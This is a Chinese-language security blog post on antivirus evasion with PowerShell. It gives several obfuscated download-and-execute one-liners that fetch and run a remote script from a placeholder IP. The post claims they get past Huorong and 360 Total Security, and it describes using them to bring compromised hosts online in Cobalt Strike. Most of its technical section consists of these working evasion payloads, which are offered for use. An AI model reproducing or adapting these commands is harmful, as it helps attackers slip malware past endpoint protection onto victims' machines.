『免杀系列』免杀技术(二) – 作者:宸极实验室Sec

0x00 前言

之前文章写了一点免杀方面的知识,主要包括了C/C++、python语言的免杀思路。之前文章写的时候,360安全卫士是12版本,可能由于最近的某项活动,现在360升级13版本,规则做了更改,可能有些思路已经无法实现,这篇文章主要讲解一些powershell方面的免杀知识。

0x01 PowerShell 简介

Windows PowerShell是一个命令行管理程序,相比较于CMD命令行,它更为强大,同时,它又是一种脚本语言,为系统管理设计。在.NET Framework的基础上构建,简单来说,可以类比UNIX系统的脚本(shell)。

2002年,微软研究了一个新的产品Monad,在2005年发布第一个版本,到2006年被重命名为Windows PowerShell,目前微软官网文档,已经更新到7.2版本,第一款默认集成PowerShell的系统版本是Windows Server 2008

0x02 PowerShell 免杀

上一部分提到,Windows PowerShell是一种脚本语言,那么通过这种语言,可以完成很多系统管理操作,同时也为攻击者提供了一种利用思路。

现在利用思路大都是利用其实现与远端IP进行通信,利用其传递木马执行实现肉鸡上线。其最主要优点就是,无文件落地,痕迹只存在于内存进程之中,隐蔽性较强。

#PowerShell 下载执行
powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://XX.XX.XX.XX/1.ps1'))"

图片[1]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

当然,像这种明目张胆通过公网IP地址下载并执行木马脚本,肯定会被杀毒软件所拦截。目前杀软对PowerShell中的参数和函数进行监测,我们可以通过逐个拆分进行探测杀软监测规则。

图片[2]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

通过上图可以发现,火绒对hidden参数进行了监测。以此类推,逐个排查,对PowerShell语句进行改进、变换、拼接等操作,实现免杀。

0x03 干货分享

接下来分享一些可绕过最新版本火绒,以及360安全卫士12.X版本的PowerShell语句。

# 拆分DownloadString函数 + echo 过最新版火绒 + 360 12.X版本
cmd /c echo $c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://XX.XX.XX.XX/test.ps1'')'.Replace('123','adString');IEX ($c1+$c2) | powershell -

图片[3]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

图片[4]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

图片[5]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

# 拆分http关键字,过360 12.X版本
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"

图片[6]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

#通过中文引号,绕过360 12.X版本
powershell "IEX ((new-object net.webclient).downloadstring('ht‘+’tp://XX.XX.XX.XX/test.ps1'))"

图片[7]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

# 替换IEX + http拆分 绕过最新版火绒
powershell "$a='123((New-Object Net.WebClient).DownloadString(''ht'.Replace('123','IEX');$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"

图片[8]-『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

以上只是我在写这篇文章的时候,随手测试的几种绕过方式,其实绕过方式还有很多很多,只要自己肯去排列组合各种可能性,可能大家都能达到免杀效果。只是通过上面的几个实例和大家探讨一下基本的PowerShell免杀思路。

而且PowerShell不仅仅可以做到木马执行上线CS操作,还可以做提权、加用户等利用方式,有兴趣的可以自己探索一下。

0x04 总结

关于PowerShell有很多的利用方式,我也是在别人的基础上去慢慢摸索,要学的东西还很多,不懂的东西还是太多,以上实例,只测试火绒/360安全卫士,其他杀毒软件未做测试。

关于360安全卫士13.X版本,太难了可能是因为最近的全国性质活动,竟然不允许以任何形式调用PowerShell,系统最高权限去启用PowerShell也是默认禁止。可能有别的方法去启动吧?目前没有探索出来,时间还是太仓促,可能就在自己的知识盲区里面,慢慢再研究吧。

作者: Mr-hello

介绍: 免杀,一个老生常谈的领域,但是当你真正了解之后,你会发现想要入门其实也还算容易。但是真正有所成就还是需要下一番功夫。

来源:freebuf.com 2021-05-24 15:45:54 by: 宸极实验室Sec

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论